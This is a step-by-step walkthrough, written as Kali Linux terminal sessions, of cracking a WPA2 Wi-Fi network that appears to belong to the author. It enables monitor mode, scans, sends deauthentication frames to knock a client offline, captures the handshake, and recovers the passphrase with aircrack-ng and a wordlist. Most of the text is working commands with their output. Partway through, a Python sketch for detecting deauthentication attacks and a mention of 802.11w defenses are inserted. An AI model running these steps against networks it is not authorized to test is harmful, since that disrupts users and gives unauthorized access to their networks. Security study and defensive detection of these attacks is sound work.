Gather Wi-Fi information
- Check whether the wireless adapter supports monitor mode
┌──(root㉿kali)-[~]
└─# airmon-ng
PHY Interface Driver Chipset
phy0 wlan0 rtl8xxxu Realtek Semiconductor Corp. RTL8188FTV 802.11b/g/n 1T1R 2.4G WLAN Adapter
- Put the adapter into monitor mode
┌──(root㉿kali)-[~]
└─# airmon-ng start wlan0
Found 3 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode
PID Name
712 dhclient
924 NetworkManager
1805 wpa_supplicant
PHY Interface Driver Chipset
phy0 wlan0 rtl8xxxu Realtek Semiconductor Corp. RTL8188FTV 802.11b/g/n 1T1R 2.4G WLAN Adapter
(monitor mode enabled)
- Scan for Wi-Fi signals in the current environment
┌──(root㉿kali)-[~]
└─# airodump-ng wlan0
Warning: Detected you are using a non-UNICODE terminal character encoding.
CH 13 ][ Elapsed: 6 s ][ 2024-12-02 19:09
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
8E:C2:81:13:D0:AD -63 31 1 0 11 360 WPA2 CCMP PSK umr
BSSID STATION PWR Rate Lost Frames Notes Probes
8E:C2:81:13:D0:AD E8:C8:29:BB:0A:99 -15 0 - 6e 0 1
8E:C2:81:13:D0:AD BE:BF:5E:2A:12:13 -77 0 - 1e 47 27
Quitting...
Capture the handshake file
- Wait for the handshake packets; do not close this terminal window
┌──(root㉿kali)-[~]
└─# airodump-ng -c 11 --bssid 8E:C2:81:13:D0:AD -w /home/umr/Desktop/wifi/handshake wlan0
Warning: Detected you are using a non-UNICODE terminal character encoding.
19:10:10 Created capture file "/home/umr/Desktop/wifi/handshake-01.cap".
CH 11 ][ Elapsed: 0 s ][ 2024-12-02 19:10
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
8E:C2:81:13:D0:AD -25 100 12 0 0 11 360 WPA2 CCMP PSK umr
BSSID STATION PWR Rate Lost Frames Notes Probes
8E:C2:81:13:D0:AD E8:C8:29:BB:0A:99 -16 0 - 6e 0 5
8E:C2:81:13:D0:AD BE:BF:5E:2A:12:13 -75 0 - 1e 0 17
Quitting...
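The airodump-ng command uses values from the Wi-Fi scan above:
  - -c is the Wi-Fi channel (the CH column)
  - --bssid is the Wi-Fi identifier (the BSSID column)
  - -w is the path where the capture files are saved
  - wlan0 is the name of the wireless adapter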
- Deauthentication attack (the "ACK death attack"); run it in a new terminal window
┌──(root㉿kali)-[~]
└─# aireplay-ng -0 100 -a 8E:C2:81:13:D0:AD -c BE:BF:5E:2A:12:13 wlan0
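  - -0 selects deauthentication, which kicks the device offline
  - 100 is the number of deauthentications to send
  - -a is the Wi-Fi identifier (the access point's BSSID)
  - -c is the MAC address of the device to kick offline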
- When [ WPA handshake: 8E:C2:81:13:D0:AD appears in the airodump-ng window, the handshake has been captured
19:10:41 Created capture file "/home/umr/Desktop/wifi/handshake-01.cap".
CH 11 ][ Elapsed: 3 mins ][ 2024-12-02 19:14 ][ WPA handshake: 8E:C2:81:13:D0:AD
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
8E:C2:81:13:D0:AD -21 100 2107 161 0 11 360 WPA2 CCMP PSK umr
BSSID STATION PWR Rate Lost Frames Notes Probes
8E:C2:81:13:D0:AD E8:C8:29:BB:0A:99 -17 1e- 6e 0 1141
8E:C2:81:13:D0:AD BE:BF:5E:2A:12:13 -71 1e- 1e 177 2250 EAPOL umr
handshake-01.cap is the handshake capture file
┌──(root㉿kali)-[/home/umr/Desktop/wifi]
└─# ll /home/umr/Desktop/wifi/
total 2556
-rw-r--r-- 1 root root 1402386 Dec 2 19:16 handshake-01.cap
-rw-r--r-- 1 root root 572 Dec 2 19:16 handshake-01.csv
-rw-r--r-- 1 root root 587 Dec 2 19:16 handshake-01.kismet.csv
-rw-r--r-- 1 root root 4031 Dec 2 19:16 handshake-01.kismet.netxml
-rw-r--r-- 1 root root 1200128 Dec 2 19:16 handshake-01.log.csv
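Seen from the defender's side, the capture step above leaves a recognisable trace: a burst of deauthentication frames aimed at one client, followed shortly by a fresh EAPOL handshake from that same client. The Python sketch below is an added example, not part of the original write-up; the frame-summary tuples, thresholds and function names are assumptions, and the sample data is constructed from the lab MAC addresses shown on this page.

```python
from collections import defaultdict, deque

# Constructed sample data: (time_ms, frame_type, bssid, station) summaries as a
# hypothetical monitor-mode sensor might log them. MACs are this page's lab values.
AP = "8E:C2:81:13:D0:AD"
TARGET = "BE:BF:5E:2A:12:13"
OTHER = "E8:C8:29:BB:0A:99"


def sample_frames():
    frames = [(500, "deauth", AP, OTHER)]  # a single, ordinary disconnect
    # 60 deauths aimed at one client, one every 50 ms
    frames += [(10_000 + i * 50, "deauth", AP, TARGET) for i in range(60)]
    # the client reconnects: four EAPOL messages of a new handshake
    frames += [(14_200 + i * 10, "eapol", AP, TARGET) for i in range(4)]
    return sorted(frames)


def detect(frames, burst=10, window_ms=1_000, follow_ms=30_000):
    """Flag deauth bursts per (bssid, station) and handshakes that follow them.

    Thresholds are assumed defaults; tune them against normal roaming traffic.
    """
    recent = defaultdict(deque)   # sliding window of deauth timestamps
    last_burst = {}               # key -> time of latest deauth inside a burst
    alerts = []
    for t, kind, bssid, sta in frames:
        key = (bssid, sta)
        if kind == "deauth":
            q = recent[key]
            q.append(t)
            while t - q[0] > window_ms:
                q.popleft()
            if len(q) >= burst:
                if key not in last_burst:
                    alerts.append(("deauth_burst", bssid, sta, t))
                last_burst[key] = t
        elif kind == "eapol" and key in last_burst:
            # First handshake frame after a burst: the capture opportunity.
            if t - last_burst.pop(key) <= follow_ms:
                alerts.append(("rehandshake_after_burst", bssid, sta, t))
    return alerts


if __name__ == "__main__":
    for alert in detect(sample_frames()):
        print(alert)
```

Enabling Protected Management Frames (802.11w) on the access point and its clients makes forged deauthentication frames ineffective, which removes the forced reconnect this detector looks for.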
Cracking
- Start cracking
┌──(root㉿kali)-[/home/umr/Desktop/wifi]
└─# aircrack-ng -w /home/umr/Desktop/pswd/password_all.txt -b 8E:C2:81:13:D0:AD /home/umr/Desktop/wifi/handshake-01.cap
Reading packets, please wait...
Opening /home/umr/Desktop/wifi/handshake-01.cap
Read 63570 packets.
1 potential targets
Aircrack-ng 1.7
[00:00:09] 119905/2814819 keys tested (13136.08 k/s)
Time left: 3 minutes, 25 seconds 4.26%
Current passphrase: d19720411
Master Key : 59 FD 9B 27 E2 AC 5A 97 42 18 64 FF 4A 62 29 A3
71 6D 0B 91 B4 26 3D 3A 8D 8B 81 69 4F 6E 8E CE
Transient Key : 85 59 FD 8E DF E0 56 36 AF CC 5A E5 21 93 78 DD
4A F5 4D 97 86 C9 65 0B 49 75 00 B4 65 CC CF 32
49 5E FF F9 0B 02 F3 05 71 E9 FC 7B 16 ED EA B8
3F 8F 27 73 C3 D8 29 84 7A 36 C7 59 88 71 16 AD
EAPOL HMAC : A6 58 13 6D 25 9F 64 56 79 5E 1E EF 8C DE 5A 7C
- KEY FOUND! [ 1234qwer ] in the output means the passphrase was recovered
┌──(root㉿kali)-[~]
└─# aircrack-ng -w /home/umr/Desktop/pswd/password_all.txt -b 8E:C2:81:13:D0:AD /home/umr/Desktop/wifi/handshake-01.cap
Reading packets, please wait...
Opening /home/umr/Desktop/wifi/handshake-01.cap
Read 65570 packets.
1 potential targets
Aircrack-ng 1.7
[00:02:29] 1930033/2814819 keys tested (13163.19 k/s)
Time left: 1 minute, 7 seconds 68.57%
KEY FOUND! [ 1234qwer ]
Master Key : 29 47 4D 9E 6B 25 DA FA 2B 1A 6F 32 E2 D0 18 72
14 A3 36 43 50 9D 3C D2 EF E3 20 99 C0 2A 13 FA
Transient Key : 59 78 9A 21 BB AA 85 1F 8C B3 06 C7 7E 3A 35 2A
75 19 03 02 E2 ED 1C 8A C5 70 89 A7 41 22 13 19
2C 2A 88 1A FE D9 A5 CA CC 02 71 8D 43 BC 44 E2
04 62 AA D7 7B 06 72 65 78 DC C6 2F 80 4A AF BC
EAPOL HMAC : C9 49 7F B9 96 90 41 7A 90 21 0E 0B 54 73 EF D8